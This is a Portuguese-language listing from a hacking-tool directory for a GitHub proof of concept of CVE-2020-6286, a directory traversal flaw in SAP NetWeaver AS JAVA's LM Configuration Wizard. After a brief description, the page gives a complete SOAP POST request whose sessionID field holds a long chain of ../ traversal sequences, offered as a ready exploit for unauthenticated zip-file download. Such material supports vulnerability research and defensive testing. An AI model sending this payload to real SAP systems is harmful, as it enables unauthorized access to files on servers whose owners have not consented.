Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-6286 — [CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) Atravessamento de Diretório | Kitploit
Ferramentas/GitHubGitHub/murataydemir/cve-2020-6286
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubmurataydemir/cve-2020-6286

CVE-2020-6286

[CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) Atravessamento de Diretório

Ver Repositório
62há 6 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

[CVE-2020-6286] SAP NetWeaver AS JAVA (LM Configuration Wizard) Directory Traversal


O SAP NetWeaver é a plataforma tecnológica integrada da SAP e a base técnica de todas as aplicações SAP desde o SAP Business Suite. O SAP NetWeaver é uma plataforma de aplicação e integração orientada a serviços que fornece um ambiente de desenvolvimento e execução para aplicações SAP, e também pode ser usado para desenvolvimento personalizado e integração com outras aplicações e sistemas. A validação insuficiente do caminho de entrada de um determinado parâmetro no serviço web do SAP NetWeaver AS JAVA (LM Configuration Wizard), versões 7.30, 7.31, 7.40, 7.50, permite que um atacante não autenticado explore um método para baixar arquivos zip para um diretório específico, levando a Path Traversal.

Para uma prova de conceito segura, você pode usar a seguinte solicitação. Se o arquivo zip existir no host remoto, ele baixa o arquivo 111.zip

root@kitploit:~
POST /CTCWebService/CTCWebServiceBean HTTP/1.1
Host: host
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: text/xml;charset=UTF-8
SOAPAction: 
Content-Length: 340

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:urn="urn:CTCWebServiceSi">
    <soapenv:Header />
    <soapenv:Body>
        <urn:queryProtocol>
            <sessionID>/../../../../../../../../../../../../../../../../../..111</sessionID>
        </urn:queryProtocol>
    </soapenv:Body>
</soapenv:Envelope>
Baixar ferramenta